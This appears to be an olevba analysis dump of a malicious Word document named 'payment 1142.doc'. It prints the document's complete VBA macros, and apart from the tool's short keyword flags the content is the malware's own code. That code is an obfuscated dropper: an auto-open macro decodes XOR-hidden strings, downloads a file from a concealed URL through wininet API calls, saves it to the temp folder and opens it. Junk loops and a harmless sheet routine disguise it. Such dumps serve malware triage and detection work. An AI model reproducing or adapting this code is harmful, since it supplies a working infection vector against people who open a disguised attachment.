Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- payment 1142.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: payment 1142.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: payment 1142.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16. HAZ82771
17. End Sub
18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
19. ANALYSIS:
20. +----------+----------+---------------------------------------+
21. | Type     | Keyword  | Description                           |
22. +----------+----------+---------------------------------------+
23. | AutoExec | AutoOpen | Runs when the Word document is opened |
24. +----------+----------+---------------------------------------+
25. -------------------------------------------------------------------------------
26. VBA MACRO Module4.bas
27. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module4'
28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
29. '*3
30. Public Const HAZ82774 = "1E1002035E597C29373725252A76591C1B01061203137D307B3C2A3A2A36545D120159170615352379607678262054"
31. '*4
32. Public Const HAZ82773 = "2507041A14023A2A317D023F2F3D620A0510131E2B1439213527"
33. '*5
34. Public Const HAZ82772 = "svdvsdvSDVSDVCX1"
35.  
36. Sub HAZ82771()
37. HONOOROA
38. End Sub
39.  
40.  
41.  
42.  
43.  
44.  
45.  
46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
47. ANALYSIS:
48. +------------+----------------+-----------------------------------------+
49. | Type       | Keyword        | Description                             |
50. +------------+----------------+-----------------------------------------+
51. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
52. |            |                | be used to obfuscate strings (option    |
53. |            |                | --decode to see all)                    |
54. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
55. |            |                | may be used to obfuscate strings        |
56. |            |                | (option --decode to see all)            |
57. +------------+----------------+-----------------------------------------+
58. -------------------------------------------------------------------------------
59. VBA MACRO Module11.bas
60. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module11'
61. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
62. '* 1
63. Public Const HAZ82776 = "250C131F08581234263F2D35222C581C18"
64.  
65. '*2
66. Public Const HAZ82775 = "2A17191F081D362A677D76787B76540B13"
67. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
68. ANALYSIS:
69. +------------+-------------+-----------------------------------------+
70. | Type       | Keyword     | Description                             |
71. +------------+-------------+-----------------------------------------+
72. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
73. |            |             | be used to obfuscate strings (option    |
74. |            |             | --decode to see all)                    |
75. +------------+-------------+-----------------------------------------+
76. -------------------------------------------------------------------------------
77. VBA MACRO Module1.bas
78. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module1'
79. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
80. ' (File name: AddNewSheet.bas)
81. ' Author: SENOO, Ken
82. ' LICENSE: CC0
83. ' (Last update: 2015-03-10T18:38+09:00)
84.  
85. Sub AddNewSheet(sheet_name)
86.  
87. ' csss
88. For Each ws In Worksheets
89.   If ws.Name = sheet_name Then
90.     Application.DisplayAlerts = False
91.     ws.Delete
92.     Application.DisplayAlerts = True
93.   End If
94. Next ws
95.  
96. ' cscc
97. Sheets.Add(After:=ActiveSheet).Name = sheet_name
98.  
99. End Sub
100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
101. ANALYSIS:
102. No suspicious keyword or IOC found.
103. -------------------------------------------------------------------------------
104. VBA MACRO UFO.frm
105. in file: payment 1142.doc - OLE stream: u'Macros/VBA/UFO'
106. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
107. (empty macro)
108. -------------------------------------------------------------------------------
109. VBA MACRO Class1.cls
110. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Class1'
111. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
112. (empty macro)
113. -------------------------------------------------------------------------------
114. VBA MACRO Module3.bas
115. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module3'
116. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
117. Option Explicit
118.  
119.  
120. Private Const KAIIOOOO872 = 8162
121. Private Const KAIIOOOO871 As String = "KAIIOOOO871"
122. Private Const KAIIOOOO999 = 1
123. Private Const cCCc = &H4000000
124. Public Function SOLOMKA110(ByVal sURL As String, ByVal sFileName As String) As Boolean
125.     #If VBA7 And Win64 Then
126.         Dim HCDNNNDCNNDC2 As LongPtr, KAIIOOOO873 As LongPtr
127.     #Else
128.         Dim HCDNNNDCNNDC2 As Long, KAIIOOOO873 As Long
129.     #End If
130.     Dim CDSFDFD As Long
131.     Dim HCDNNNDCNNDC As String * KAIIOOOO872, KAIIOOOO874 As String
132.     Dim VVzzVz As Integer, dData As Double
133.     HCDNNNDCNNDC2 = SOLOMKA110222(KAIIOOOO871, KAIIOOOO999, vbNullString, vbNullString, 0)
134.     If HCDNNNDCNNDC2 = 0 Then
135.         Exit Function
136.     End If
137.     KAIIOOOO873 = SOLOMKA1102(HCDNNNDCNNDC2, sURL, vbNullString, 0, cCCc, 0)
138.     If KAIIOOOO873 = 0 Then
139.         dData = 0
140.     Else
141.         KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
142.         KAIIOOOO874 = HCDNNNDCNNDC
143.         Do While CDSFDFD <> 0
144.             KOOOODAAAAA1 KAIIOOOO873, HCDNNNDCNNDC, KAIIOOOO872, CDSFDFD
145.            
146.             Dim HhhhhHHuuU73772 As Integer
147. For HhhhhHHuuU73772 = 0 To 0
148. If HhhhhHHuuU73772 = 5 Then End
149. Next HhhhhHHuuU73772
150.            
151.             KAIIOOOO874 = KAIIOOOO874 + Mid(HCDNNNDCNNDC, 1, CDSFDFD)
152.         Loop
153.         dData = Len(KAIIOOOO874): VVzzVz = FreeFile
154.         Open sFileName For Binary Access Write Lock Write As #VVzzVz
155.         Put #VVzzVz, , KAIIOOOO874: Close #VVzzVz
156.     End If
157.     SOLOMKA1102222 KAIIOOOO873
158.     SOLOMKA1102222 HCDNNNDCNNDC2
159.     KAIIOOOO874 = ""
160.     If dData Then
161.         SOLOMKA110 = True
162.     End If
163. End Function
164. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
165. ANALYSIS:
166. +------------+-------------+-----------------------------------------+
167. | Type       | Keyword     | Description                             |
168. +------------+-------------+-----------------------------------------+
169. | Suspicious | Open        | May open a file                         |
170. | Suspicious | Write       | May write to a file (if combined with   |
171. |            |             | Open)                                   |
172. | Suspicious | Put         | May write to a file (if combined with   |
173. |            |             | Open)                                   |
174. | Suspicious | Binary      | May read or write a binary file (if     |
175. |            |             | combined with Open)                     |
176. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
177. |            |             | be used to obfuscate strings (option    |
178. |            |             | --decode to see all)                    |
179. +------------+-------------+-----------------------------------------+
180. -------------------------------------------------------------------------------
181. VBA MACRO Module2.bas
182. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module2'
183. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
184.  
185. #If VBA7 And Win64 Then
186. Public Declare PtrSafe Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
187. Public Declare PtrSafe Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
188. Public Declare PtrSafe Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As LongPtr, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
189. Public Declare PtrSafe Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
190. #Else
191. Public Declare Function SOLOMKA1102222 Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
192. Public Declare Function SOLOMKA110222 Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
193. Public Declare Function KOOOODAAAAA1 Lib "wininet.dll" Alias "InternetReadFile" (ByVal cCCc3333 As Long, ByVal HCDNNNDCNNDC As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
194. Public Declare Function SOLOMKA1102 Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
195. #End If
196.  
197.  
198. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
199. ANALYSIS:
200. +------------+----------------+-----------------------------------------+
201. | Type       | Keyword        | Description                             |
202. +------------+----------------+-----------------------------------------+
203. | Suspicious | Lib            | May run code from a DLL                 |
204. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
205. |            |                | be used to obfuscate strings (option    |
206. |            |                | --decode to see all)                    |
207. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
208. |            |                | may be used to obfuscate strings        |
209. |            |                | (option --decode to see all)            |
210. | IOC        | wininet.dll    | Executable file name                    |
211. +------------+----------------+-----------------------------------------+
212. -------------------------------------------------------------------------------
213. VBA MACRO Module5.bas
214. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module5'
215. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
216.  
217.  
218. Sub _
219. HONOOROA()
220. '* cASCAccaCACA
221. Dim _
222. HAZ82769
223. Dim SiCoUnT As Integer
224.  
225. Dim VgdgHH333jKKkllKAHNXNHHGDG87293 As Long
226. For VgdgHH333jKKkllKAHNXNHHGDG87293 = 17 To 20
227. SiCoUnT = VgdgHH333jKKkllKAHNXNHHGDG87293 + 1
228. Next VgdgHH333jKKkllKAHNXNHHGDG87293
229.  
230. Set HAZ82769 = CreateObject _
231. (STOP7777777777 _
232. (HAZ82772, HAZ82773))
233. Dim HAZ82768
234. Const HAZ82768ID = 2
235. Dim JHAIICENAU019 As Integer
236. For JHAIICENAU019 = 0 To 0
237. If JHAIICENAU019 = 5 Then End
238. Next JHAIICENAU019
239. Set HAZ82768 = HAZ82769.GetSpecialFolder _
240. (HAZ82768ID)
241. Dim chdhai93 As Integer
242. For chdhai93 = 0 To 0
243. If chdhai93 = 5 Then End
244. Next chdhai93
245. HAZ82767 = HAZ82768 & STOP7777777777 _
246. (HAZ82772, HAZ82775)
247. Dim hiaopen847 As Integer
248. For hiaopen847 = 0 To 0
249. If hiaopen847 = 5 Then End
250. Next hiaopen847
251. Set HAZ82769 = CreateObject _
252. (STOP7777777777 _
253. (HAZ82772, HAZ82773))
254. Dim BnBnHgs346 As Integer
255. For BnBnHgs346 = 0 To 0
256. If BnBnHgs346 = 5 Then End
257. Next BnBnHgs346
258. If HAZ82769.FileExists _
259. (HAZ82767) Then
260. HAZ82769. _
261. DeleteFile HAZ82767
262. End If
263. If SOLOMKA110(STOP7777777777 _
264. (HAZ82772, HAZ82774), HAZ82767) Then
265. End If
266. Set SSSS = Nothing
267. If HAZ82769. _
268. FileExists _
269. (HAZ82767) Then
270. End If
271. Set SASASA = CreateObject _
272. (STOP7777777777 _
273. (HAZ82772, HAZ82776))
274. SASASA.Open HAZ82767
275. End Sub
276. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
277. ANALYSIS:
278. +------------+--------------+-----------------------------------------+
279. | Type       | Keyword      | Description                             |
280. +------------+--------------+-----------------------------------------+
281. | Suspicious | CreateObject | May create an OLE object                |
282. | Suspicious | Open         | May open a file                         |
283. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
284. |            |              | be used to obfuscate strings (option    |
285. |            |              | --decode to see all)                    |
286. +------------+--------------+-----------------------------------------+
287. -------------------------------------------------------------------------------
288. VBA MACRO Module6.bas
289. in file: payment 1142.doc - OLE stream: u'Macros/VBA/Module6'
290. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
291. Option Explicit
292.  
293. Public Function STOP7777777777(STOP777777777 As String, STOP77777777 As String) As String
294.     Dim asasas1 As Long
295.     Dim asasas1O As String
296.     Dim asasas10 As Integer
297.     Dim asasas101 As Integer
298.     For asasas1 = 1 To (Len(STOP77777777) / 2)
299.         asasas10 = Val("&H" & (Mid$(STOP77777777, (2 * asasas1) - 1, 2)))
300.         asasas101 = Asc(Mid$(STOP777777777, ((asasas1 Mod Len(STOP777777777)) + 1), 1))
301.         asasas1O = asasas1O + Chr(asasas10 Xor asasas101)
302.     Next asasas1
303.    STOP7777777777 = asasas1O
304. End Function
305. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
306. ANALYSIS:
307. +------------+-------------+-----------------------------------------+
308. | Type       | Keyword     | Description                             |
309. +------------+-------------+-----------------------------------------+
310. | Suspicious | Chr         | May attempt to obfuscate specific       |
311. |            |             | strings                                 |
312. | Suspicious | Xor         | May attempt to obfuscate specific       |
313. |            |             | strings                                 |
314. | Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
315. |            |             | be used to obfuscate strings (option    |
316. |            |             | --decode to see all)                    |
317. +------------+-------------+-----------------------------------------+